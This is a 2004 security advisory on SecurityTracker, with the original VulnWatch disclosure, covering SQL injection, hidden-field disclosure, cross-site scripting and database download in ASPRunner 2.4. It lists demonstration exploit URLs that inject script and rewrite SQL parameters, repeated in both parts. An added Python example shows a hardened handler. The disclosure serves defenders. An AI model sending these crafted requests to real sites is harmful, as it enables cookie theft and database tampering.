SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Generic)  >   ASPRunner
Vendors:   XLineSoft
ASPRunner Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1010777
SecurityTracker URL:  http://securitytracker.com/id/1010777
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 26 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): 2.4 and prior versions
Description:   Several vulnerabilities were reported in ASPRunner. A remote user can inject SQL commands. A remote user can conduct cross-site scripting attacks. A remote user may also be able to download the underlying database.

Ferruh Mavituna reported that none of the pages (except the login pages) filter user-supplied input to protect against SQL injection attacks. A remote user can submit a specially crafted request to cause SQL commands to be executed on the underlying database.

It is also reported that a remote user can view and modify potentially sensitive information contained in hidden fields within the HTML forms. Some fields disclose full SQL queries, the report said.

It is also reported that several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted HTTP POST request that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the ASPRunner scripts and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

For [TABLE]_search.asp (post):

http://[VICTIM]/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word
_id&NeedQuoteswordid=False%2C+False&Typewordid=3%2C+3&SearchOption=Contains&
SearchFor=&FieldName=tr&NeedQuotestr=True&Typetr=202&SearchOption=Contains&S
earchFor=&FieldName=en&NeedQuotesen=True&Typeen=202&SearchOption=Contains&Se
archFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&FieldNam
e=desc&NeedQuotesdesc=True&Typedesc=203&SearchOption=Contains&SearchFor=

For [TABLE]_edit.asp (post):

http://[VICTIM]/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPa
geNumber=1&SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ese
lect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc
%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&NeedQuoteswordid=False&Ne
edQuotes=&NeedQuotes=&action=view

For [TABLE]_list.asp (post):

http://[VICTIM]/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGotoPa
ge=&action=Search&SQL=select+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C
+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++where+1%3D0+or+%5Btr%5D+
like+%27%25&orderby=+order+by+%5Ben%5D+desc&PageSize=20&SearchField=AnyField
&SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%2
9%3C%2Fscript%3E&PageSizeSelect=20&NeedQuoteswordid=False&Typewordid=3&NeedQ
uoteswordid=False&Typewordid=3&NeedQuotestr=True&Typetr=202&NeedQuotesen=Tru
e&Typeen=202&NeedQuotesdesc=True&Typedesc=203

For export.asp (post):

http://[VICTIM]/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%
3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben
%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&mypage=1&
pagesize=20
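The requests above show the two defects together: the query itself arrives in client-editable fields (SQL, orderby, NeedQuotes*, Type*) and the SearchFor value is echoed back unescaped. The following Python, added here and not ASPRunner's own code, models a hardened _list.asp handler that builds the query from a server-side allowlist with bound parameters and HTML-escapes the reflected term. The table map, the victim.example host and the shortened request are constructed for the example.

```python
from html import escape
from urllib.parse import parse_qs, urlsplit

# Server-side description of the generated page (constructed for this example).
# In the vulnerable generator this information travelled in hidden form fields
# (SQL=, orderby=, NeedQuotes*, Type*) that the client could rewrite.
TABLES = {"dictionary": {"columns": ("word_id", "tr", "en", "desc"), "order": "en"}}

# Request parameters the advisory shows the generated pages trusting.
CLIENT_SQL_FIELDS = ("SQL", "orderby", "NeedQuotes", "Type")


def build_query(table, search_field, search_for):
    """Return (sql, params) built only from the allowlist; user text is bound."""
    meta = TABLES[table]
    cols = meta["columns"]
    if search_field == "AnyField":
        fields = cols
    elif search_field in cols:
        fields = (search_field,)
    else:
        raise ValueError("unknown search field")
    where = " OR ".join(f"[{c}] LIKE ?" for c in fields)
    sql = (f"SELECT {', '.join(f'[{c}]' for c in cols)} FROM [{table}] "
           f"WHERE {where} ORDER BY [{meta['order']}] DESC")
    params = [f"%{search_for}%"] * len(fields)   # data, never spliced into sql
    return sql, params


def handle_list_request(url):
    """Emulate _list.asp: drop client-supplied SQL, escape the reflected term."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)
    table = parts.path.rsplit("/", 1)[-1].removesuffix("_list.asp")
    ignored = sorted(k for k in qs if k.startswith(CLIENT_SQL_FIELDS))
    search_field = qs.get("SearchField", ["AnyField"])[0]
    search_for = qs.get("SearchFor", [""])[0]
    sql, params = build_query(table, search_field, search_for)
    # The advisory's XSS comes from echoing SearchFor raw; encode it for HTML.
    html = f'<input name="SearchFor" value="{escape(search_for, quote=True)}">'
    return {"sql": sql, "params": params, "html": html, "ignored": ignored}


# Constructed sample request, shortened from the advisory's _list.asp URL.
DEMO_URL = ("http://victim.example/dictionary_list.asp?action=Search"
            "&SQL=select+%5Bword_id%5D+From+%5Bdictionary%5D&orderby=+order+by+%5Ben%5D"
            "&SearchField=AnyField&NeedQuotestr=True&Typetr=202"
            "&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E")

if __name__ == "__main__":
    result = handle_list_request(DEMO_URL)
    print(result["sql"], result["params"], result["html"], result["ignored"], sep="\n")
```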

It is also reported that a remote user can download the database if the name of the database file is known. By examining table and field names, a remote user may be able to guess the filename, the report said. A demonstration exploit URL is provided:

http://[VICTIM]/db/[DB-FILE-NAME]

The vendor was reportedly notified on July 5, 2004 and July 12, 2004 without response.

The original advisory is available at:

http://ferruh.mavituna.com/article/?574

Impact:   A remote user can inject SQL commands to be executed by the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the ASPRunner scripts, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user may be able to download the underlying database.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.xlinesoft.com/asprunner/
Cause:   Access control error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] ASPRunner Multiple Vulnerabilities


------------------------------------------------------
ASPRunner Multiple Vulnerabilities
------------------------------------------------------

Online URL : http://ferruh.mavituna.com/article/?574

1) SQL Injection;
Severity : Moderately Critical

2) Information Disclosure;
Severity : Low Critical

3) XSS (Cross Site Scripting);
Severity : Low Critical

4) Database Download;
Severity : Moderately Critical


------------------------------------------------------
ABOUT ASPRunner;
------------------------------------------------------
Developer Description;
ASPRunner creates a set of ASP pages to access and modify Oracle, SQL
Server, MS Access, DB2, MySQL, or FileMaker databases, or any other ODBC
datasource. Using generated ASP pages, users can search, sort, edit, delete
and add data into a database. ASPRunner is easy to learn; you can get
started in just 10 minutes!

URL & Demo Download;
http://www.xlinesoft.com/asprunner/


------------------------------------------------------
VULNERABLE;
------------------------------------------------------
ASPRunner version 2.4 and below


------------------------------------------------------
NOT VULNERABLE;
------------------------------------------------------
-

------------------------------------------------------
1) SQL Injection;
------------------------------------------------------
Every page is vulnerable to SQL injection attacks (login pages are not
vulnerable).
There is no PoC because SQL injection attacks depend on database type
and structure.



------------------------------------------------------
2) INFORMATION DISCLOSURE;
------------------------------------------------------
An attacker can gain information from hidden fields and file names.

	- File names disclose the database-generated table name.
	- Several hidden fields show complete SQL queries.
	- These hidden fields can also be modified.
	- Errors generate a detailed page which gives lots of
information to the client.

------------------------------------------------------
3) XSS (Cross Site Scripting);
------------------------------------------------------
There is no control for XSS attacks; some samples from several pages:
	
	- [TABLE]_search.asp (post)
	
http://[VICTIM]/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word
_id&NeedQuoteswordid=False%2C+False&Typewordid=3%2C+3&SearchOption=Contains&
SearchFor=&FieldName=tr&NeedQuotestr=True&Typetr=202&SearchOption=Contains&S
earchFor=&FieldName=en&NeedQuotesen=True&Typeen=202&SearchOption=Contains&Se
archFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&FieldNam
e=desc&NeedQuotesdesc=True&Typedesc=203&SearchOption=Contains&SearchFor=


	- [TABLE]_edit.asp (post)
	
http://[VICTIM]/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPa
geNumber=1&SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ese
lect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc
%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&NeedQuoteswordid=False&Ne
edQuotes=&NeedQuotes=&action=view


	- [TABLE]_list.asp (post)
	
http://[VICTIM]/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGotoPa
ge=&action=Search&SQL=select+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C
+++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++where+1%3D0+or+%5Btr%5D+
like+%27%25&orderby=+order+by+%5Ben%5D+desc&PageSize=20&SearchField=AnyField
&SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%2
9%3C%2Fscript%3E&PageSizeSelect=20&NeedQuoteswordid=False&Typewordid=3&NeedQ
uoteswordid=False&Typewordid=3&NeedQuotestr=True&Typetr=202&NeedQuotesen=Tru
e&Typeen=202&NeedQuotesdesc=True&Typedesc=203

	- export.asp (post)
	
http://[VICTIM]/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%
3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben
%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&mypage=1&
pagesize=20



------------------------------------------------------
4) Database Download;
------------------------------------------------------
	The database can be downloaded over the web. This is not a critical issue
because there is no way to determine the filename, but it is easy to guess by
gathering information about table and field names.

	An MS Access or other database file (if it is not an MSSQL, similar, or ODBC
connection) can be found at http://[VICTIM]/db/[DB-FILE-NAME]



------------------------------------------------------
HISTORY;
------------------------------------------------------
Discovered : 04.07.2004
Vendor Informed : 05.07.2004 / 12.07.2004
Published : 26.07.2004


------------------------------------------------------
Vendor Status;
------------------------------------------------------
2 emails, No Reply, No Fix



Ferruh Mavituna
http://ferruh.mavituna.com
PGP Key: http://ferruh.mavituna.com/pgpkey.asc

